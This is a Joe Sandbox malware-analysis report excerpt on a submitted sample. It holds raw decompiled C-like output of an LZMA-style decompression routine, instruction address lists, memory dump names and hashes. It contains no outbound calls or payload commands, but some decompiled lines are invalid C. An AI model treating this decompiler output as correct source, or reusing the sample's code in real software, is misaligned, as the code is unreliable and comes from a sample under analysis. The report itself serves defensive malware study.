														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406f8c
0x00406f8c
0x00406f90
0x00406fb5
0x00406fbf
0x00000000
0x00406f92
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa3
0x00406fa3
0x00406fa6
0x00407080
0x00407080
0x00407087
0x00407087
0x0040708a
0x00407091
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x0040703e
0x0040703e
0x0040703e
0x004067da
0x004067da
0x004067da
0x004067e3
0x00000000
0x00000000
0x004067e9
0x00000000
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406853
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407013
0x00407017
0x004071c6
0x00000000
0x004071c6
0x00407023
0x0040702a
0x00407032
0x00407035
0x00407038
0x00407038
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695b
0x004069cc
0x004069cf
0x004069d2
0x004069d9
0x004069e3
0x00000000
0x004069e3
0x0040695d
0x00406961
0x00406964
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x0040697e
0x00406982
0x00406989
0x0040698c
0x00406993
0x00406997
0x0040699f
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a3
0x004069a6
0x004069c4
0x004069c6
0x00000000
0x004069a8
0x004069a8
0x004069ab
0x004069ae
0x004069b1
0x004069b3
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00000000
0x004069bf
0x00000000
0x00406bf5
0x00406bf9
0x00406c17
0x00406c1a
0x00406c21
0x00406c24
0x00406c27
0x00406c2a
0x00406c2d
0x00406c30
0x00406c32
0x00406c39
0x00406c3a
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c45
0x00406c4a
0x00000000
0x00406c4a
0x00406bfb
0x00406bfe
0x00406c01
0x00406c0b
0x00000000
0x00000000
0x00406c5f
0x00406c63
0x00406c86
0x00406c89
0x00406c8c
0x00406c96
0x00406c65
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c7b
0x00406c7e
0x00406c7e
0x00000000
0x00000000
0x00406ca2
0x00406ca6
0x00000000
0x00000000
0x00406cac
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb8
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc3
0x00000000
0x00000000
0x00406d13
0x00406d17
0x00406d1e
0x00406d21
0x00406d24
0x00406d2e
0x00000000
0x00406d2e
0x00406d19
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d57
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d60
0x00406d67
0x00406d6c
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00407160
0x00000000
0x00407160
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a17
0x00406a1a
0x00000000
0x00000000
0x00406a20
0x00406a26
0x00000000
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a57
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a93
0x00406a9a
0x00406a9d
0x00000000
0x00406aa3
0x00000000
0x00406aa3
0x00000000
0x00406aa8
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406acd
0x00406acd
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af0
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1b
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2c
0x00000000
0x00406b2c
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b31
0x00000000
0x00000000
0x00406b6c
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8b
0x00406b8e
0x00406b91
0x00406b91
0x00406b97
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00406b38
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406bdf
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406be4
0x00406beb
0x00406bee
0x00000000
0x00406bf0
0x00000000
0x00406bf0
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00406c4d
0x00406c4d
0x00406c50
0x00406fc2
0x00406fc2
0x00000000
0x00000000
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00000000
0x00407079
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00000000
0x00000000
0x0040713a
0x0040713d
0x0040703e
0x0040703e
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x00000000
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00000000
0x00000000
0x00406cc6
0x00406cc6
0x00406cca
0x00407190
0x00000000
0x00407190
0x00406cd0
0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406f85
0x004071ba
0x004071dc
0x004071e2
0x004071e4
0x004071eb
0x004071ed
0x004071f4
0x004071f8
0x00000000
0x004067e9
0x004071f1
0x004071f1
0x00000000
0x004071f1
0x0040703e
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x0040711b
0x00000000
0x00406f90

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406CA2() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
